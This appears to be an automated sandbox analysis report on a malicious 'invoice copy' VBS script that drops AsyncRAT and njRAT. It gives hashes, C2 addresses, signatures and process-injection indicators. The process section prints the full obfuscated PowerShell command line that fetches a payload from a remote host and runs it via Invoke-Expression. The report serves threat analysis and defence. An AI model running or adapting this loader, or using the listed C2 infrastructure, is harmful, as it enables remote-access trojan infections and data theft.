Analysis
- max time kernel: 146s
- max time network: 150s
- platform: windows10_x64
- resource: win10-en
- submitted: 13-09-2021 20:36
- Static task: static1
- Behavioral task: behavioral1
- Sample: V00GH01_Invoice_Copy.vbs
- Resource: win7v20210408
General
- Target: V00GH01_Invoice_Copy.vbs
- Size: 3KB
- MD5: f0eb4b843b026d5d100f69d47c2f576e
- SHA1: f29356a70659a502ef8eea82fef2cc05e92d80fd
- SHA256: c083348abc25e7c20eed06e9ceddd94af7b4787ea22dbca312d4b9e8504cf882
- SHA512: 57165f90091e183b248dc0cb8f7a8ca8dffa68818b4bbc045e7128ed13326c71e94de1111daefcd6875438afe3b2b765d51195ea1e3a0f8e986c74956f00c801
Malware Config

Extracted
- URL: http://52.188.147.221/All%20in%20One/fj.txt

Extracted
- Family: asyncrat
- Version: 0.5.7B
- Botnet: Default
- C2:
  jilldoggyy.duckdns.org:7840
  jilldoggyy.duckdns.org:7829
  jilldoggyy.duckdns.org:7841
  103.147.185.192:7840
  103.147.185.192:7829
  103.147.185.192:7841
- Mutex: AsyncMutex_6SI8OkPnk
- Attributes:
  anti_vm: false
  bsod: false
  delay: 3
  install: false
  install_folder: %AppData%
  pastebin_config: null

Extracted
- Family: njrat
- Version: v4.0
- Botnet: HacKed
- C2: 20.194.35.6:8023
- Mutex: Windows
- Attributes:
  reg_key: Windows
  splitter: |-F-|
Signatures

- suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
- suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)

- Async RAT payload (2 IoCs)
  Processes:
  resource                                                                      yara_rule
  behavioral2/memory/5096-156-0x0000000000400000-0x0000000000412000-memory.dmp  asyncrat
  behavioral2/memory/5096-157-0x000000000040C77E-mapping.dmp                    asyncrat

- Blocklisted process makes network request (2 IoCs)
  Processes: powershell.exe
  flow  pid   process
  2     4780  powershell.exe
  8     4780  powershell.exe

- Suspicious use of SetThreadContext (2 IoCs)
  Processes: powershell.exe
  description                          pid   process         target process
  PID 4780 set thread context of 5096  4780  powershell.exe  aspnet_compiler.exe
  PID 4780 set thread context of 4152  4780  powershell.exe  aspnet_compiler.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe
  pid   process
  4780  powershell.exe  (3 identical entries)

- Suspicious use of AdjustPrivilegeToken (31 IoCs)
  Processes: powershell.exe, aspnet_compiler.exe, aspnet_compiler.exe
  description                        pid   process
  Token: SeDebugPrivilege            4780  powershell.exe
  Token: SeDebugPrivilege            5096  aspnet_compiler.exe
  Token: SeDebugPrivilege            4152  aspnet_compiler.exe
  Token: 33                          4152  aspnet_compiler.exe  (14 entries, alternating with the next row)
  Token: SeIncBasePriorityPrivilege  4152  aspnet_compiler.exe  (14 entries)

- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes: WScript.exe, powershell.exe
  description                       pid   process         target process
  PID 4732 wrote to memory of 4780  4732  WScript.exe     powershell.exe       (2 identical entries)
  PID 4780 wrote to memory of 5096  4780  powershell.exe  aspnet_compiler.exe  (8 identical entries)
  PID 4780 wrote to memory of 4152  4780  powershell.exe  aspnet_compiler.exe  (8 identical entries)
Processes

- C:\Windows\System32\WScript.exe (depth 1)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\V00GH01_Invoice_Copy.vbs"
  - Suspicious use of WriteProcessMemory
  - Child process (depth 2); image path and full command line as recorded by the sandbox follow:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://52H-H188H-H147H-H221/All%20in%20One/fjH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-
X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split '-X-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (depth 3)
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (depth 3)
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- memory/4152-161-0x0000000000400000-0x000000000040E000-memory.dmp  Filesize: 56KB
- memory/4152-174-0x0000000005440000-0x0000000005441000-memory.dmp  Filesize: 4KB
- memory/4152-173-0x00000000054B0000-0x00000000054B1000-memory.dmp  Filesize: 4KB
- memory/4152-172-0x00000000054A0000-0x00000000054A1000-memory.dmp  Filesize: 4KB
- memory/4152-167-0x00000000059B0000-0x00000000059B1000-memory.dmp  Filesize: 4KB
- memory/4152-166-0x0000000004E30000-0x0000000004E31000-memory.dmp  Filesize: 4KB
- memory/4152-162-0x000000000040836E-mapping.dmp
- memory/4780-126-0x000001B6FE9E0000-0x000001B6FE9E1000-memory.dmp  Filesize: 4KB
- memory/4780-155-0x000001B6FD990000-0x000001B6FD994000-memory.dmp  Filesize: 16KB
- memory/4780-144-0x000001B6FDDB8000-0x000001B6FDDB9000-memory.dmp  Filesize: 4KB
- memory/4780-133-0x000001B6FDDB6000-0x000001B6FDDB8000-memory.dmp  Filesize: 8KB
- memory/4780-115-0x0000000000000000-mapping.dmp
- memory/4780-125-0x000001B6FDDB3000-0x000001B6FDDB5000-memory.dmp  Filesize: 8KB
- memory/4780-124-0x000001B6FDDB0000-0x000001B6FDDB2000-memory.dmp  Filesize: 8KB
- memory/4780-120-0x000001B6FDD60000-0x000001B6FDD61000-memory.dmp  Filesize: 4KB
- memory/5096-156-0x0000000000400000-0x0000000000412000-memory.dmp  Filesize: 72KB
- memory/5096-157-0x000000000040C77E-mapping.dmp
- memory/5096-168-0x00000000058D0000-0x00000000058D1000-memory.dmp  Filesize: 4KB
- memory/5096-171-0x0000000005ED0000-0x0000000005ED1000-memory.dmp  Filesize: 4KB